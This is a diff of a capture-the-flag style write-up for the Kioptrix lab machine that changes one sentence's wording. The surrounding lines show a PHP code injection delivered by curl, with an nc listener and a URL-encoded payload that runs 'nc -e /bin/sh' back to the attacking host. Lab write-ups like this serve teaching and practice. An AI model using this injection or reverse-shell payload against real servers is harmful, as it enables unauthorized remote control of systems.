AndreyRainchik/Writeups/kioptrix1-2/kioptrix1-2.md

 ![](images/curlphp.png "Performing the code injection with cURL")

-Now that we know that we can execute arbitray PHP code on the web server, we can set up a shell for us to use with `nc` and a crafted web request.
+Now that we know we can execute arbitray PHP code on the web server, we can set up a shell for us to use with `nc` and a crafted web request.
 On the attacking machine, we'll use the command `nc -lvp 4444` so that `nc` listens on port 4444 for a connection.
 Then, we'll use cURL again with the command `curl -X POST http://10.0.2.7/index.php?page=%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2fbin%2fsh%2010.0.2.5%204444%27%29%7D%3B%23%22`.
 This URL encodes the PHP code `');${system('nc -e /bin/sh 10.0.2.5 4444')};#"`, which will spawn an instance of /bin/sh with its input and output redirected to the given IP and port, essentially allowing us to have a shell.

 ![](images/ncshell.png "Spawning a shell with nc")